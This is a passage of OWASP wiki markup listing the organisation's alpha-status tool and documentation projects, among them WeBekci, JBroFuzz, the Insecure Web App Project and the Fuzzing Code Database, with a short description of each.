: OWASP WeBekci is a web-based ModSecurity 2.x management tool. WeBekci is written in PHP; its backend is powered by MySQL and its frontend by the XAJAX framework.<br />
</td><td><br />
<br />
; [[:Category:OWASP CLASP Project|OWASP CLASP Project]]<br />
: a project focused on defining process elements that reinforce application security<br />
<br />
; [[:Category:OWASP Code Review Project|OWASP Code Review Project]]<br />
: a project to capture best practices for reviewing code<br />
<br />
; [[:Category:OWASP Tools Project|OWASP Tools Project]]<br />
: The OWASP Tools Project's goal is to provide unbiased, practical information and guidance about application security tools.<br />
<br />
</td></tr></table><br />
<br />
==Alpha Status Projects==<br />
<br />
<table valign="top"><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP PHP AntiXSS Library Project|OWASP PHP AntiXSS Library Project]]<br />
: reduce cross-site scripting vulnerabilities by encoding your output<br />
<br />
; [[:Category:OWASP Insecure Web App Project|OWASP Insecure Web App Project]]<br />
: a web application that includes common web application vulnerabilities<br />
<br />
; [[:Category:OWASP Interceptor Project|OWASP Interceptor Project]]<br />
: a testing tool for XML web service and Ajax interfaces<br />
<br />
; [[:Category:OWASP JBroFuzz|OWASP JBroFuzz Project]]<br />
: a fuzzer application, supporting a number of automated security checks including basic cross site scripting checks (XSS) as well as basic SQL injection testing.<br />
<br />
; [[:Category:OWASP Orizon Project|OWASP Orizon Project]]<br />
: a project focused on the development of a flexible code review engine<br />
<br />
; [[:Category:OWASP Stinger Project|OWASP Stinger Project]]<br />
: a project focused on the development of a centralized input validation mechanism which can be easily applied to existing or developmental applications<br />
<br />
; [[:Category:OWASP_Web_2.0_Project|OWASP Web 2.0 Project]]<br />
: A place for advanced research of security in the Web 2.0 world <br />
<br />
</td><td><br />
<br />
; [[:Category:OWASP AJAX Security Project|OWASP AJAX Security Guide]]<br />
: investigating the security of AJAX enabled applications<br />
<br />
; [[:Category:OWASP Application Security Assessment Standards Project|OWASP Application Security Assessment Standards Project]]<br />
: establish a set of standards defining baseline approaches to conducting differing types/levels of application security assessment<br />
<br />
; [[:Category:OWASP Application Security Requirements Project|OWASP Application Security Requirements]]<br />
<br />
; [[:Category:OWASP Application Security Metrics Project|OWASP Application Security Metrics Project]]<br />
: identify and provide a set of application security metrics that have been found by contributors to be effective in measuring application security <br />
<br />
; [[:Category:OWASP Career Development Project|OWASP Career Development Project]]<br />
: The OWASP Career Development project is focused on helping application security professionals understand the job market, roles, career paths, and skills to work in the field.<br />
<br />
; [[:Category:OWASP Certification Criteria Project|OWASP Certification Criteria Project]]<br />
<br />
; [[:Category:OWASP Certification Project|OWASP Certification Project]]<br />
: our challenge is to create a plan for certification: a set of OWASP Certification for Developers and Testers. <br />
<br />
; [[:Category:OWASP Communications Project|OWASP Communications Project]]<br />
<br />
; [[:Category:OWASP Honeycomb Project|OWASP Honeycomb Project]]<br />
: a comprehensive and integrated guide to the fundamental building blocks of application security<br />
<br />
; [[:Category:OWASP Java Project|OWASP Java Project]]<br />
: a project focused on helping Java and J2EE developers build secure applications<br />
<br />
; [[:Category:OWASP Logging Project|OWASP Logging Guide]]<br />
: a project to define best practices for logging and log management<br />
<br />
; [[:Category:OWASP PHP Project|OWASP PHP Project]]<br />
: a project focused on helping PHP developers build secure applications<br />
<br />
; [[:Category:OWASP Validation Project|OWASP Validation Project]]<br />
: a project that provides guidance and tools related to validation<br />
<br />
; [[:Category:OWASP WASS Project|OWASP WASS Guide]]<br />
: a standards project to develop more concrete criteria for secure applications<br />
<br />
; [[:Category:OWASP Web Application Security Put Into Practice|OWASP Web Application Security Put Into Practice]]<br />
: real-world web application security for Ruby on Rails, Apache and MySQL<br />
<br />
; [[:Category:OWASP XML Security Gateway Evaluation Criteria Project|OWASP XML Security Gateway Evaluation Criteria]]<br />
: a project to define evaluation criteria for XML Security Gateways<br />
<br />
; [[:Category:OWASP Education Project|OWASP Education Project]]<br />
: a project to build educational tracks and modules for different audiences<br />
<br />
; [[:Category:OWASP on the Move Project|OWASP on The Move Project]]<br />
: a project to match supply and demand for OWASP (related) presentations by speakers at web application security events or chapter meetings.<br />
<br />
; [[:Category:OWASP Fuzzing Code Database|OWASP Fuzzing Code Database]]<br />
: a project to collect, share and compose statements used for code injection, such as SQL, SSI, XSS and format string statements, as well as directory traversal statements. <br />
<br />
</td></tr></table><br />
<br />
__NOTOC__</div>
Foobar23